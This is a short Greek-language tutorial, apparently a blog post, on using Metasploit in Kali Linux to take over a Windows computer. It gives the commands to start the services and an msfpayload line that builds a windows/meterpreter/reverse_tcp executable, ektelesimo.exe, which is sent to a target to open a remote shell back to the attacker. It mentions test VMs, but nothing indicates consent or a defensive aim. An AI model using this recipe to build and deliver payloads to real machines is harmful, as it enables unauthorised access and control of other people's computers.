Και πάλι καλησπέρα σας. Όπως είχαμε πει θα ασχοληθούμε λίγο περισσότερο με το metasploit για να μάθουμε τα βασικά μέσα από παραδείγματα χρήσεώς του. Σήμερα μέσω του metasploit, που θα τρέχει μέσα από ένα VM Kali Linux χάρις ενός payload που θα στείλουμε σε έναν άλλον υπολογιστή θα πάρουμε πρόσβαση σε αυτόν. Ο συγκεκριμένος τρόπος δουλεύει σχεδόν σε όλες τις εκδόσεις windows μέχρι και τα windows 8.
Καταρχάς ανοίγουμε το Virtualbox(ή το VMWare που σε αυτή την περίπτωση θα μας γλίτωνε από πολύ κόπο αν δοκιμάζουμε σε εικονικές μηχανές), και κάνουμε τις ρυθμίσεις έτσι ώστε να τρέξουμε το Kali Linux.
Μόλις ξεκινήσει ανοίγουμε ένα Terminal και γράφουμε:
- service postgresql start
- service metasploit start
Για τον σκοπό αυτό θα χρησιμοποιήσουμε το payload "windows/meterpreter/reverse_tcp" και δίπλα θα βάλουμε LHOST και LPORT. Τέλος θέλουμε να το αποθηκεύσουμε στην επιφάνεια εργασίας μας με το όνομα ektelesimo.exe. Άρα η εντολή μας θα γίνει: "msfpayload windows/meterpreter/reverse_tcp LHOST=η τοπική ip σας LPORT=8080 x > /root/Desktop/ektelesimo.exe".
Για να δείτε την τοπική IP σας μπορείτε να ανοίξετε ένα άλλο terminal(ή μια καρτέλα μέσα στο ίδιο) και να γράψετε "ifconfig", αντί για "ipconfig" που υπάρχει στα windows, και κοιτάξτε δίπλα στο inet addr.
Τέλος πρέπει να δώσουμε τα στοιχεία που δώσαμε προηγουμένως. Άρα δίνουμε LHOST και LPORT.
*Πηγή*:http://thanasaras13.blogspot.gr/2013/08/windows-metasploit.html
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου